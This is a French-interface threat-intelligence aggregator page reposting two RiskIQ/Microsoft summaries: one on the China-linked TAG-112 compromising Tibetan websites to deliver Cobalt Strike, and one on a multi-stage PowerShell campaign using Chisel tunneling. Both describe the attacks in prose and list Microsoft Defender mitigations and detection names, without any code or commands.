One Article Review
| Source |  RiskIQ |
|---|---|
| Identifiant | 8610692 |
| Date de publication | 2024-11-13 22:41:09 (vue: 2024-11-13 23:08:22) |
| Titre | China-Nexus TAG-112 Compromises Tibetan Websites to Distribute Cobalt Strike (Recyclage) |
| Texte | ## Snapshot In May 2024, websites tied to the Tibetan community were compromised by a suspected Chinese state-sponsored threat group named TAG-112, resulting in the covert deployment of Cobalt Strike, a common penetration testing tool misused for cyber-espionage. ## Description According to research from Recorded Future\'s Insikt Group, the websites, including Tibet Post and Gyudmed Tantric University, were altered to show fake security warnings, tricking users into downloading malicious files. The attackers exploited vulnerabilities in Joomla, the websites\' content management system, to insert malicious JavaScript. This code was crafted to detect a visitor\'s operating system and browser, pushing a download disguised as a “security certificate” for Windows users, ultimately loading Cobalt Strike. To conceal the origin of its operations, TAG-112 utilized Cloudflare\'s protection services. Insikt Group\'s analysis linked several samples of the Cobalt Strike Beacon payload to TAG-112, and their infrastructure also shows a presence on servers in South Korea. Recorded Future notes that TAG-112 appears to share connections with TAG-102, also known as Evasive Panda, another Chinese-linked threat group with similar targeting objectives and methods. However, TAG-112\'s tactics display less sophistication, suggesting it may be a distinct subgroup under the larger TAG-102 umbrella. According to Insikt Group, this campaign underscores longstanding Chinese intelligence objectives to monitor and suppress Tibetan organizations and other minority groups perceived as threats to the Chinese Communist Party\'s authority. Researchers anticipate that TAG-112, along with other Chinese threat groups, will continue targeting human rights and independence-linked organizations. ## Microsoft Analysis and Additional OSINT Context Evasive Panda, also known as Bronze Highland, DaggerFly, and TAG-102, has been active since at least 2012. The group is known to conduct cyberespionage against individuals and organizations of interest to China, including government entities. According to [previous reporting from ESET](https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/), the group has been observed targeting individuals in mainland China, Hong Kong, Macao, and Nigeria. The group builds custom malware frameworks with modular architecture in order to deploy MgBot. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats. - Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access. - Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endp |
| Notes | ★★★ |
| Envoyé | Oui |
| Condensat | ### **© 102 1112 112 2012 2024 2024** 21562b1004d5/analystreport 365/security/defender 4b5e 5155 access accessed according action active additional af74 against age alert alerts all allow along also altered analysis another anticipate antivirus any appears apt architecture are artifacts attack attacker attackers authority automated based beacon been behind block breach breaches bronze browser builds campaign can certificate” changes china chinese cloud cloudflare cobalt code com/2023/04/26/evasive com/en com/hubfs/reports/cta com/microsoft com/threatanalytics3/9382203e common communist community components compromised compromises conceal conduct configure connections content context continue controlled copyright cover covert crafted credential criterion custom customers cyber cyberespionage daggerfly defend defender delivered deploy deployment description detect detected detections/hunting detects disguised display distinct distribute distribution does download downloading edr enable enabled encyclopedia endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent ensure entities equivalent eset espionage evasive even evolving executable exploited fake files folder folders follow following frameworks from full future government group groups gyudmed hardening has highland hong however https://go https://learn https://security https://www human immediate impact including independence individuals infrastructure insert insikt intelligence interest investigation investigations its javascript joomla known kong korea larger learndoc learning least less like linked list loading local longstanding lsa lsass macao machine mainland majority malicious malware malware: manage management may meet methods mgbot microsoft minority misused mitigations mode modular monitor name=program:win32/wacapew name=trojan:win32/leonem name=trojan:win32/wacatac named network new nexus nigeria non not notes objectives observed ocid=magicti operating operations order organizations origin osint other overview panda part party passive payload pdf penetration perceived permission popular post preferences premises presence prevalence prevent previous product program:win32/wacapew prohibited protection protection#how protections pushing queries ransomware rapidly recommendations recommends recorded recordedfuture reduce reducing reduction reference#block references remediate remediation reporting reproduction research researchers reserved resolve resulting rights rule rules run running samples scenes security servers services settings several share show shows significantly similar since site snapshot software/ sophistication south sponsored state stealing strike subgroup subsystem suggesting suppress surface suspected system tactics tag take tamper tantric targeting techniques testing theft thereof threat threats tibet tibetan tied tool tools tricking trojan:win32/leonem trojan:win32/wacatac trusted turn ultimately umbrella under underscores university unknown unless updates us/defender us/wdsi/threats/malware used users utilized view=o365 visitor volume vulnerabilities warnings websites welivesecurity when will windows without works worldwide written xdr your “security |
| Tags | Ransomware Malware Tool Vulnerability Threat |
| Stories | |
| Move | 
|
Les reprises de l'article (1):
| Source | RiskIQ |
|---|---|
| Identifiant | 8609992 |
| Date de publication | 2024-11-12 19:14:23 (vue: 2024-11-12 20:08:26) |
| Titre | Harnessing Chisel for Covert Operations: Dissecting a Multi-Stage PowerShell Campaign |
| Texte | ## Snapshot Cyble Research and Intelligence Lab (CRIL) has uncovered a sophisticated, multi-stage malware campaign that uses PowerShell scripts to achieve stealthy persistence within targeted systems. ## Description The attack starts with a malicious LNK (shortcut) file that triggers a PowerShell script to download additional malicious code. In the first stage, the script establishes persistence by executing secondary PowerShell scripts, which continue to communicate with the command-and-control (C&C) server. This leads to a third stage, where the PowerShell script downloads commands from the C&C server to perform various malicious tasks, such as data exfiltration. The infrastructure analysis reveals that the threat actors leverage Chisel, a tunneling tool, allowing them to bypass network defenses and move laterally within the compromised network. The attackers also use a Netskope proxy to obfuscate communications, further enhancing their stealth. Chisel enables the attackers to access internal networks and carry out activities like scanning the internal network or enabling isolated systems to download additional payloads, making this campaign highly evasive. According to CRIL, this campaign is a highly organized and possibly financially motivated, utilizing advanced techniques to evade detection and maintain long-term control over infected systems. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats. - Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access. - Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint. - Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint. - Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport) to defend against common credential theft techniques like LSASS access. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem) LSA protection. ## Detections/Hunting Queries ### Microsoft Defender Antivirus Microsoft Defender Antivirus detects threat components as the following malware: - [PUA:Win32/Puwaders](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=PUA:Win32/Puwaders.C!ml) ## References [Harnessing Chisel for Covert Operations: Dissecting a Multi-Stage PowerShell Campaig](https://cyble.com/blog/dissecting-a-multi-stag |
| Notes | ★★★ |
| Envoyé | Oui |
| Condensat | ### **© 2024 2024** 21562b1004d5/analystreport 365/security/defender 4b5e 5155 access accessed according achieve action activities actors additional advanced af74 against alert alerts all allow allowing also analysis antivirus any are artifacts attack attacker attackers authority automated based behind block breach breaches bypass c&c campaig campaign can carry changes chisel chisel/ cloud code com/blog/dissecting com/en com/microsoft com/threatanalytics3/9382203e command commands common communicate communications components compromised configure content continue control controlled copyright cover covert credential cril cyble data defend defender defenses delivered description detect detected detection detections/hunting detects dissecting distribution does download downloads edr enable enabled enables enabling encyclopedia endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent enhancing ensure equivalent establishes evade evasive even evolving executing exfiltration file financially first folder folders follow following from full further hardening harnessing has highly https://cyble https://learn https://security https://www immediate impact infected infrastructure intelligence internal investigation investigations isolated lab laterally leads learndoc learning leverage like lnk local long lsa lsass machine maintain majority making malicious malware malware: manage microsoft mitigations mode motivated move multi name=pua:win32/puwaders netskope network networks new non not obfuscate ocid=magicti operations: organized out over overview part passive payloads perform permission persistence possibly post powershell preferences premises product prohibited protection protection#how protections proxy pua:win32/puwaders queries rapidly recommendations recommends reduce reducing reduction reference#block references remediate remediation reproduction research reserved resolve reveals rights rules run running scanning scenes script scripts secondary security server settings shortcut significantly site snapshot sophisticated stage starts stealing stealth stealthy subsystem such surface systems take tamper targeted tasks techniques term theft them thereof third threat threats tool tools triggers tunneling turn uncovered unknown us/defender us/wdsi/threats/malware use uses using utilizing various view=o365 volume when where which windows within without works worldwide written your |
| Tags | Malware Tool Threat |
| Stories | |
| Move |
|
L'article ne semble pas avoir été repris sur un précédent.